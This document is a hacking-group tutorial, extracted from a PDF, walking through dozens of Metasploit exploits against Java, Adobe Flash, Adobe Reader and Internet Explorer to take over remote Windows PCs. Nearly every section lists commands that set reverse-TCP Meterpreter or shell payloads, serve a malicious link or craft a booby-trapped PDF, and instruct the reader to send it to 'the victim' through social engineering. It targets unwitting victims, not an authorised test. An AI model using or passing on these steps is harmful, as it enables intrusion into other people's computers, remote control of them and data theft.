back track tutorials

[Type text]

IriIriISIrIsT.Ir Page 1

Back Track Tutorials

How to Attack on Remote PC With Applications Vulnerabilities

By : Red H4t V!per

© All Right Reserved For IrIsT Security Team

[Type text]


B

Contact :

[email protected]

[email protected]

© Copy Right :

All Right Reserved For IrIsT Security Team - Behnam Abbasi

Vanda

Spacial Tnx To :

Am!r , C0dex , B3HZ4D , TaK.FaNaR , 0x0ptim0us , Mr.XHat

Skote_Vahshat , (^_^)

Gr33TZ To : IrIsT , TBH , 3xp1r3 , KurdHackTeam

[Type text]


Introduction :

In this paper an attempt is made on how to exploiting

vulnerabilities and geting access from remote pc with

metasploit on back track .

Its is assumed that you're familiar enough with the Linux

operating system and the metasploit software .

So we go straight to Attack Topic.

Thanks all Dears for reading this article

[Type text]


Attacting on Remote Windows PC using java Signed Applet Methodacked :

This exploit dynamically creates a .jar file via the Msf:: Exploit::Java mixin, then signs the

it. The resulting signed applet is presented to the victim via a web page with an applet

tag. The victim’s JVM will pop a dialog asking if they trust the signed applet. On older

versions the dialog will display the value of CERTCN in the “Publisher” line. Newer JVMs

display “UNKNOWN” when the signature is not trusted (i.e., it’s not signed by a trusted

CA). The SigningCert option allows you to provide a trusted code signing cert, the values

in which will override CERTCN. If SigningCert is not given, a randomly generated self-

signed cert will be used. Either way, once the user clicks “run”, the applet executes with

full user permissions.

Open backtrack terminal type msfconsole then type below command:

use exploit/multi/browser/java_signed_applet

Now type Show options :

Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp

Msf exploit (Java_signed-applet)>Set appletname adobe (The main applet’s class name)

Msf exploit (Java_signed-applet)>Set certcn adobe player (value for the certificate)

Msf exploit (Java_signed-applet)>Set srvhost 192.168.42.131 (This must be an address on the

local machine)

Msf exploit (Java_signed-applet)>Set srvport 80 (The local port to listen on default: 8080)

Msf exploit (Java_signed-applet)>Set uripath adobeclipes (The Url to use for this exploit)

Msf exploit (Java_signed-applet)>Set lport 4443

Msf exploit (Java_signed-applet)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 / adobeclipes

Send the link of the server to the victim via any social engineering technique.

When the victim open that link in their browser You get access to the victims PC.

Use “Sessions -l” and the Session number to connect to the session

[Type text]


Attacting On Remote Windows PC using Sun Java Command Line Injection :

This module exploits a flaw in the Web Start component of the Sun Java Runtime

Environment. The arguments passed to Java Web Start are not properly validated,

allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known

-J option, an attacker can take advantage of the -XXaltjvm option, as discussed

previously by Ruben Santamarta. This method allows an attacker to execute

arbitrary code in the context of an unsuspecting browser user. In order for this

module to work, it must be run as root on a server that does not serve SMB.

Additionally, the target host must have the Web Client service (WebDAV Mini-

Redirector) enabled


use exploit/windows/browser/java_ws_vmargs

Msf exploit (java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_vmargs)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_ws_vmargs)>set srvhost 192.168.42.131 (This must be an address on the

local machine)

Msf exploit (java_ws_vmargs)>set srvport 80

Msf exploit (java_ws_vmargs)>set uripath / (The Url to use for this exploit)

Msf exploit (java_ws_vmargs)>exploit

Now an URL you should give to your victim http:// 192.168.42.131/




[Type text]


Attacting On Remote Windows PC using Java Atomic Reference Array Type Violation

Vulnerability :

This module exploits vulnerability due to the fact that AtomicReferenceArray uses

the unsafe class to store a reference in an array directly, which may violate type

safety if not used properly. This allows a way to escape the JRE sandbox, and load

additional classes in order to perform malicious operations.


use exploit/windows/browser/java_atomicreferencearray

Msf exploit (java_atomicreferencearray)>set payload generic/shell_reverse_tcp

Msf exploit (java_atomicreferencearray)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_atomicreferencearray)>set srvhost 192.168.42.131 (This must be an

address on the local machine)

Msf exploit (java_atomicreferencearray)>set uripath yes (The Url to use for this exploit)

Msf exploit (java_atomicreferencearray)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ yes




[Type text]


Attacting On Remote Windows PC using java Trusted Chain Method :

This module exploits vulnerability in Java Runtime Environment that allows an

untrusted method to run in a privileged context. The vulnerability affects version

6 prior to update 19 and version 5 prior to update 23.


use exploit/windows/browser/java_trusted_chain

Msf exploit (java_trusted_chain)>set payload java/meterpreter/reverse_tcp

Msf exploit (java_trusted_chain)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_trusted_chain)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

Msf exploit (java_trusted_chain)>set uripath jta (The Url to use for this exploit)

Msf exploit (java_trusted_chain)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jta




[Type text]


Attacting On Remote Windows PC using Java RMIConnectionImpl Deserialization

Privilege Escalation Exploit :

This module exploits vulnerability in the Java Runtime Environment that allows to

deserialize a Marshalled Object containing a custom class loader under a

privileged context. The vulnerability affects version 6 prior to update 19 and

version 5 prior to update 23.


use exploit/windows/browser/java_rmi_connection_impl

Msf exploit (java_rmi_connection_impl)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_rmi_connection_impl)>set srvhost 192.168.42.131 (This must be an


Msf exploit (java_rmi_connection_impl)>set uripath bip (The Url to use for this exploit)

Msf exploit (java_rmi_connection_impl)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/bip




[Type text]


Attacting On Remote Windows PC using Sun Java Runtime Buffer Overflow :

This module exploits a flaw in the new plugin component of the Sun Java Runtime

Environment before v6 Update 22. By specifying specific parameters to the new

plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary

code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy

the contents of the “docbase” parameter to a stack-buffer using the “sprintf”

function. A string of 396 bytes is enough to overflow the 256 byte stack buffer

and overwrite some local variables as well as the saved return address. NOTE: The

string being copied is first passed through the “WideCharToMultiByte”. Due to

this, only characters which have a valid localized multibyte representation are

allowed. Invalid characters will be replaced with question marks (‘?’).


use exploit/windows/browser/java_docbase_bof

Msf exploit (java_docbase_bof)>set payload

windows/meterpreter/reverse_tcp

Msf exploit (java_docbase_bof)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_docbase_bof)>set srvhost 192.168.42.131 (This must be

an address on the local machine)

Msf exploit (java_docbase_bof)>set uripath jab (The Url to use for this

exploit)

Msf exploit (java_docbase_bof)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jab




[Type text]


Attacting On Remote Windows PC using Sun Java Applet2ClassLoader Remote

Code Execution ::

This module exploits vulnerability in the Java Runtime Environment that allows an

attacker to run an applet outside of the Java Sandbox. When an applet is invoked

with: 1. A “codebase” parameter that points at a trusted directory 2. A “code”

parameter that is a URL that does not contain any dots the applet will run outside

of the sandbox. This vulnerability affects JRE prior to version 6 update 24.


use exploit/windows/browser/java_codebase_trust

Msf exploit (java_codebase_trust)>set payload java/meterpreter/reverse_tcp

Msf exploit (java_codebase_trust)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_codebase_trust)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

Msf exploit (java_codebase_trust)>set uripath jt (The Url to use for this exploit)

Msf exploit (java_codebase_trust)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jt




[Type text]


Attacting On Remote Windows PC using Sun Java Web start Execution:

This module exploits vulnerability in Java Runtime Environment that allows an

attacker to escape the Java Sandbox. By injecting a parameter into a java’s call

within the Basic Service Impl class the default java sandbox policy file can be

therefore overwritten. The vulnerability affects version 6 prior to update 22.

NOTE: Exploiting this vulnerability causes several sinister-looking popup windows

saying that Java is “Downloading application.”


use exploit/windows/browser/java_basicservice_impl

Msf exploit ((java_basicservice_impl)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_basicservice_impl) set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_basicservice_impl)>set srvhost 192.168.42.131 (This must be an


Msf exploit (java_basicservice_impl)>set uripath jbs (The Url to use for this exploit)

Msf exploit (java_basicservice_impl)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jbs




[Type text]


Attacting On Remote Windows PC using java Applet Rhino Script :

This module exploits vulnerability in the Rhino Script Engine that can be used by a

Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability

affects version 7 and version 6 update 27 and earlier, and should work on any

browser that supports Java (for example: IE, Firefox, Google Chrome, etc)


use exploit/windows/browser/java_rhino

Msf exploit (java_rhino)>set srvhost 192.168.42.131 (This must be an address on the local

machine)

Msf exploit (java_rhino)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_rhino)>set target 1 (Opreating system of Victim PC)

Msf exploit (java_rhino)>set uripath jr (The Url to use for this exploit)

Msf exploit (java_rhino)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jr




[Type text]


Attacting On Remote Windows PC using Java MixerSequencer Object GM_Song

Structure Handling Vulnerability :

This module exploits a flaw within the handling of MixerSequencer objects in Java

6u18 and before. Exploitation id done by supplying a specially crafted MIDI file

within an RMF File. When the MixerSequencer objects is used to play the file, the

GM Song structure is populated with a function pointer provided by a SONG block

in the RMF. A Midi block that contains a MIDI with a specially crafted controller

event is used to trigger the vulnerability. When triggering the vulnerability “ebx”

points to a fake event in the MIDI file which stores the shell code. A “jmp ebx”

from msvcr71.dll is used to make the exploit reliable over java updates.


use exploit/windows/browser/java_mixer_sequencer

Msf exploit (java_mixer_sequencer)>set payload


Msf exploit (java_mixer_sequencer) set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_mixer_sequencer)>set srvhost 192.168.42.131 (This must be an


Msf exploit (java_mixer_sequencer)>set uripath jm (The Url to use for this exploit)

Msf exploit (java_mixer_sequencer)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jm




[Type text]


Attacting On Remote Windows PC using Sun Java Calendar Deserialization

Privilege Escalation :

This module exploits a flaw in the deserialization of Calendar objects in the Sun

JVM. The payload can be either a native payload which is generated as an

executable and dropped/executed on the target or a shell from within the Java

applet in the target browser. The affected Java versions are JDK and JRE 6 Update

10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and

earlier (SDK and JRE 1.3.1 are not affected).


use exploit/windows/browser/java_calendar_deserialize

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jc




Msf exploit (java_calendar_deserialize)>set payload java/meterpreter/reverse_tcp

Msf exploit (java_calendar_deserialize)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_calendar_deserialize)>set srvhost 192.168.42.131 (This must be an


Msf exploit (java_calendar_deserialize)>set uripath jc (The Url to use for this exploit)

Msf exploit (java_calendar_deserialize)>exploit

[Type text]


Attacting On Remote Windows PC using Sun Java JRE get Sound bank file :

This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and

passed to the applet via PARAM tags. It must be a native payload. The effected

Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21

and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and

earlier. NOTE: Although all of the above versions are reportedly vulnerable, only

1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.


use exploit/multi/browser/java_getsoundbank_bof

Msf exploit (java_getsoundbank_bof)>set payload generic/shell_reverse_tcp

Msf exploit (java_getsoundbank_bof)>set lhost 192.168.42.131 (IP of Local

Host)

Msf exploit (java_getsoundbank_bof)>set uripath js (The Url to use for this

exploit)

Msf exploit (java_getsoundbank_bof)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jc




[Type text]


Attacting On Remote Windows PC using Sun Java JRE AWT setDiffICM Buffer

Overflow :

This module exploits a flaw in the setDiffICM function in the Sun JVM. The

payload is serialized and passed to the applet via PARAM tags. It must be a native

payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK

and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and

JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly

vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.


use exploit/windows/browser/java_setdifficm_bof

Msf exploit (java_setdifficm_bof)>set payload generic/shell_reverse_tcp

Msf exploit (java_setdifficm_bof)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_setdifficm_bof)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

Msf exploit (java_setdifficm_bof)>set uripath rb (The Url to use for this exploit)

Msf exploit (java_setdifficm_bof)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/rb




[Type text]


Attacting On Remote Windows PC using Sun Java Web Start Plugin Command Line

Argument Injection :

This module exploits a flaw in the Web Start Plugin component of Sun Java Web

Start. The arguments passed to Java Web Start are not properly validated. By

passing the lesser known -J option, an attacker can pass arbitrary options directly

to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben

Santamarta, an attacker can execute arbitrary code in the context of an

unsuspecting browser user. This vulnerability was originally discovered

independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that

all versions since version 6 Update 10 “are believed to be affected by this

vulnerability.” In order for this module to work, it must be run as root on a server

that does not serve SMB. Additionally, the target host must have the Web Client

service (WebDAV Mini-Redirector) enabled.


use exploit/windows/browser/java_ws_arginject_altjvm

Msf exploit (java_ws_arginject_altjvm)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_arginject_altjvm)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_ws_arginject_altjvm)>set srvhost 192.168.42.131 (This must be an


Msf exploit (java_ws_arginject_altjvm)>exploit

Now an URL you should give to your victim http:// 192.168.42.131/




[Type text]


Attacting On Remote Windows PC usingJava Applet JAX-WS Remote Code

Execution :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java

code outside of the sandbox as exploited in the wild in November of 2012. The

vulnerability affects Java version 7u7 and earlier.


use exploit/multi/browser/java_jre17_jaxws

msf exploit (java_jre17_jaxws)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_jaxws)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (java_jre17_jaxws)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

msf exploit (java_jre17_jaxws)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_jaxws)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/




[Type text]


Attacting On Remote Windows PC using Java 7 Applet Remote Code Execution :

The exploit takes advantage of two issues in JDK 7: The Class Finder and Method

Finder.find Method(). Both were newly introduced in JDK 7. Class Finder is a

replacement for class For Name back in JDK 6. It allows untrusted code to obtain a

reference and have access to a restricted package in JDK 7, which can be used to

abuse sun.awt. Sun Toolkit (a restricted package). With sun.awt. Sun Toolkit, we

can actually invoke get Field() by abusing find Method() in

Statement.invokeInternal() (but get Field() must be public, and that’s not always

the case in JDK 6) in order to access Statement.acc’s private field, modify Access

Control Context, and then disable Security Manager. Once Security Manager is

disabled, we can execute arbitrary Java code. Our exploit has been tested

successfully against multiple platforms, including: IE, Firefox, Safari, Chrome;

Windows, Ubuntu, OS X, Solaris, etc.


use exploit/multi/browser/java_jre17_exec

msf exploit (java_jre17_exec)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_exec)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (java_jre17_exec)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

msf exploit (java_jre17_exec)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_exec)>exploit


Send the link of the server to the victim via any social engineering technique. When the victim

open that link in their browser You get access to the victims PC. Use “Sessions -l” and the

Session number to connect to the session

[Type text]


Attacting On Remote Windows PC using Java Applet Field Bytecode Verifier Cache

Remote Code Execution :

This module exploits vulnerability in HotSpot bytecode verifier where an invalid

optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to

insufficient type checks. This allows a way to escape the JRE sandbox, and load

additional classes in order to perform malicious operations


use exploit/multi/windows/browser/java_verifier_field_access

Msf exploit (java_verifier_field_access)>set payload java/shell_reverse_tcp

Msf exploit (java_verifier_field_access)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (java_verifier_field_access)>set srvhost 192.168.42.131 (This must be an


Msf exploit (java_verifier_field_access)>set uripath / (The Url to use for this exploit)

Msf exploit (java_verifier_field_access)>exploit





[Type text]


Attacting On Remote Windows PC using Java Applet Field Bytecode Verifier Cache

Remote Code Execution :

This module exploits a vulnerability found in the ActiveX component of Adobe

Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the

SWF, it is possible to gain arbitrary remote code execution under the context of

the user, as exploited in the wild.


use exploit/windows/browser/adobe_flash_otf_font

msf exploit (adobe_flash_otf_font)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (adobe_flash_otf_font)>set srvhost 192.168.42.131 (This must be an


msf exploit (adobe_flash_otf_font)>set uripath flu (The Url to use for this exploit)

msf exploit (adobe_flash_otf_font)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/flu




[Type text]


Attacting On Remote Windows PC using Adobe Flash Player 11.3 Font Parsing

Code Execution :

This module exploits a vulnerability found in the ActiveX component of Adobe

Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the

SWF, it is possible to gain arbitrary remote code execution under the context of

the user, as exploited in the wild.


use exploit/windows/browser/adobe_flash_otf_font

Now an URL you should give to your victim http:// 192.168.42.131 :8080/fpu




msf exploit (adobe_flash_otf_font)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_otf_font)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (adobe_flash_otf_font)>set srvhost 192.168.42.131 (This must be an


msf exploit (adobe_flash_otf_font)>set uripath fpu (The Url to use for this exploit)

msf exploit (adobe_flash_otf_font)>exploit

[Type text]


Attacting On Remote Windows PC using Adobe Flash Player Object Type

Confusion :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a

corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code

execution under the context of the user. This vulnerability has been exploited in

the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack.

According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.


use exploit/windows/browser/adobe_flash_rtmp

Msf exploit (adobe_flash_rtmp)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_flash_rtmp)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_flash_rtmp)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

Msf exploit (adobe_flash_rtmp)>set uripath / (The Url to use for this exploit)

Msf exploit (adobe_flash_rtmp)>exploit





[Type text]


Attacting On Remote Windows PC using Adobe util.printf() Buffer Overflow :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat

Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed

util.printf() entry, an attacker may be able to execute arbitrary code.


use exploit/windows/fileformat/adobe_utilprintf

After we successfully generate the malicious PDF File, it will stored on your local computer

/root/.msf4/local/book.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit

successfully executed.

Now send your book.pdf files to victim, as soon as they download and open it. Now you can

access meterpreter shell on victim computer. Use “Sessions -l” and the Session number to

connect to the session.

Msf exploit (adobe_utilprintf)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_utilprintf)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_utilprintf)>set filename book.pdf

Msf exploit (adobe_utilprintf)>exploit

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.42.131

exploit

[Type text]


Attacting On Remote Windows PC using Adobe Doc.media.newPlayer Use After

Free Vulnerability :

This module exploits a use after free vulnerability in Adobe Reader and Adobe

Acrobat Professional versions up to and including 9.2.


use exploit/windows/browser/adobe_media_newplayer

Msf exploit (adobe_media_newplayer)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_media_newplayer)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_media_newplayer)>set srvhost 192.168.42.131 (This must be an


Msf exploit (adobe_media_newplayer)>set uripath ad (The Url to use for this exploit)

Msf exploit (adobe_media_newplayer)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ad




[Type text]


Attacting On Remote Windows PC using Adobe Reader U3D Memory Corruption

Vulnerability :

This module exploits vulnerability in the U3D handling within versions 9.x through

9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is due to the

use of uninitialized memory. Arbitrary code execution is achieved by embedding

specially crafted U3D data into a PDF document. A heap spray via JavaScript is

used in order to ensure that the memory used by the invalid pointer issue is

controlled.


use exploit/windows/fileformat/adobe_reader_u3d

Msf exploit (adobe_reader_u3d)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_reader_u3d)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_reader_u3d)>set filename learning.pdf

Msf exploit (adobe_reader_u3d)>exploit


/root/.msf4/local/learning.pdf



use exploit/multi/handler


set lhost 192.168.42.131

exploit

[Type text]


Now send your learning.pdf files to victim, as soon as they download and open it. Now you can


connect to the session.

Attacting On Remote Windows PC using Adobe PDF Escape EXE Social

Engineering:

This module embeds a Metasploit payload into an existing PDF file in a non-

standard method. The resulting PDF can be sent to a target as part of a social

engineering attack.


use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename parse.pdf

Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit


/root/.msf4/local/parse.pdf



Use exploit/multi/handler


set lhost 192.168.42.131

exploit

[Type text]


Attacting On Remote Windows PC Using Adobe Acrobat Bundled LibTIFF Integer

Overflow :

This module exploits integer overflow vulnerability in Adobe Reader and Adobe

Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.


use exploit/windows/fileformat/adobe_libtiff


/root/.msf4/local/ebook.pdf



Now send your parse.pdf files to victim, as soon as they download and open it. Now you

can access meterpreter shell on victim computer. Use “Sessions -l” and the Session number

to connect to the session

Msf exploit (adobe_libtiff)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_libtiff)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_libtiff)>set filename ebook.pdf

Msf exploit (adobe_libtiff)>exploit

[Type text]


Now send your ebook.pdf files to victim, as soon as they download and open it. Now you can


connect to the session

Attacting On Remote Windows PC Using Adobe Collab.collect Email Info() Buffer

Overflow :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat

Professional 8.1.1. By creating a specially crafted pdf that a contains malformed

Collab.collectEmailInfo () call, an attacker may be able to execute arbitrary code


use exploit/windows/fileformat/adobe_collectemailinfo

Msf exploit (adobe_collectemailinfo)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_collectemailinfo)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_collectemailinfo)>set filename math.pdf

Msf exploit (adobe_collectemailinfo)>exploit


/root/.msf4/local/math.pdf





set lhost 192.168.42.131

exploit

[Type text]


Now send your math.pdf files to victim, as soon as they download and open it. Now you can


connect to the session

Attacting On Remote Windows PC Using Adobe CoolType SING Table

“uniqueName” Stack Buffer Overflow :

This module exploits vulnerability in the Smart Independent Glyplets (SING) table

handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is

assumed to be vulnerable as well.


use exploit/windows/browser/adobe_cooltype_sing

Msf exploit (adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_cooltype_sing)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.42.131 (This must be an address

on the local machine)

Msf exploit (adobe_cooltype_sing)>set uripath fr (The Url to use for this exploit)

Msf exploit (adobe_cooltype_sing)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/fr




set lhost 192.168.42.131

exploit

[Type text]




Attacting On Remote Windows PC Using Adobe JBIG2Decode Heap

Corruption Exploit:

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0

and earlier. This module relies upon JavaScript for the heap spray.


use exploit/windows/browser/adobe_jbig2decode

Msf exploit (adobe_jbig2decode)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.42.131 (This must be an address on the

local machine)

Msf exploit (adobe_jbig2decode)>set uripath beniimage (The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/beniimage


W hen the victim open that link in their browser You get access to the victims PC.


[Type text]


Attacting On Remote Windows PC Using Adobe Collab.getIcon() Buffer Overflow:

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.

Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted

pdf that a contains malformed Collab.getIcon () call, an attacker may be able to

execute arbitrary code.


use exploit/windows/browser/adobe_geticon

Msf exploit (adobe_geticon)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_geticon)>show options

Msf exploit (adobe_geticon)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (adobe_geticon)>set srvhost 192.168.42.131 (This must be an address on the

local machine)

Msf exploit (adobe_geticon)>set uripath adb (The Url to use for this exploit)

Msf exploit (adobe_geticon)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/adb




\\

[Type text]


Attacting On Remote Windows PC Using Microsoft Internet Explorer exec

Command Use-After-Free Vulnerability ::

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE).

When rendering an HTML page, the CMshtmlEd object gets deleted in an

unexpected manner, but the same memory is reused again later in the

CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note

that this vulnerability has been exploited in the wild since Sep 14 2012, and there

is currently no official patch for it.


use exploit/windows/browser/ie_execcommand_uaf

msf exploit (ie_execcommand_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (ie_execcommand_uaf)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (ie_execcommand_uaf)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

msf exploit (ie_execcommand_uaf)>set uripath ie (The Url to use for this exploit)

msf exploit (ie_execcommand_uaf)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie




[Type text]


Attacting On Remote Windows PC Using Internet Explorer COM Create Object

Code Execution :

This module exploits generic code execution vulnerability in Internet Explorer by

abusing vulnerable ActiveX objects.


use exploit/windows/browser/ie_createobject

Msf exploit (ie_createobject)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ie_createobject)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (ie_createobject)>set srvhost 192.168.42.131 (This must be an address on the

local machine)

Msf exploit (ie_createobject)>set uripath ie (The Url to use for this exploit)

Msf exploit (ie_createobject)>exploit





[Type text]


Attacting On Remote Windows PC Using Internet Explorer Web View Folder Icon

setSlice() Overflow :

This module exploits a flaw in the WebViewFolderIcon ActiveX control included

with Windows 2000, Windows XP, and Windows 2003. This flaw was published

during the Month of Browser Bugs project


use exploit/windows/browser/ms06_057_webview_setslice

Msf exploit (ms06_057_webview_setslice)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms06_057_webview_setslice)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (ms06_057_webview_setslice)>set srvhost 192.168.42.131 (This must be an address on the local machine)

Msf exploit (ms06_057_webview_setslice)>set uripath ie (The Url to use for this exploit)

Msf exploit (ms06_057_webview_setslice)>exploit





[Type text]


Attacting On Remote Windows PC Using Internet Explorer Daxctle.OCX Key Frame

Method Heap Buffer Overflow Vulnerability :

This module exploits heap overflow vulnerability in the Key Frame method of the

direct animation ActiveX control. This is a port of the exploit implemented by

Alexander Sotirov.


use exploit/windows/browser/ms06_067_keyframe

Msf exploit (ms06_067_keyframe)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms06_067_keyframe)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (ms06_067_keyframe)>set srvhost 192.168.42.131 (This must be an address


Msf exploit (ms06_067_keyframe) set uripath ie (The Url to use for this exploit)

Msf exploit (ms06_067_keyframe)>exploit





[Type text]


Attacting On Remote Windows PC Using Internet Explorer create Text Range ()

Code Execution :

This module exploits code execution vulnerability in Microsoft Internet Explorer.

Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which,

under certain circumstances, can lead to an invalid/corrupt table pointer

dereference. EIP will point to a very remote, non-existent memory location. This

module is the result of merging three different exploit submissions and has only

been reliably tested against Windows XP SP2. This vulnerability was

independently discovered by multiple parties. The heap spray method used by

this exploit was pioneered by Skylined.


use exploit/windows/browser/ms06_013_createtextrange

Msf exploit (ms06_013_createtextrange)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms06_013_createtextrange)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (ms06_013_createtextrange)>set 192.168.42.131 (This must be an address on the

local machine)

Msf exploit (ms06_013_createtextrange)>set uripath ie (The Url to use for this exploit)

Msf exploit (ms06_013_createtextrange)>exploit





[Type text]


Attacting On Remote Windows PC Using MS11_003 Internet Explorer Exploit :

This module exploits a memory corruption vulnerability within Microsoft’s HTML

engine (mshtml). When parsing an HTML page containing a recursive CSS import,

a C++ object is deleted and later reused. This leads to arbitrary code execution.

This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’

module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such,

this module should be reliable on all Windows versions with .NET 2.0.50727

installed.


use exploit/windows/browser/ms11_003_ie_css_import

Now an URL you should give to your victim http:// 192.168.42.131 : 80/hack.flv




Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.42.131(This must be an address on

the local machine)

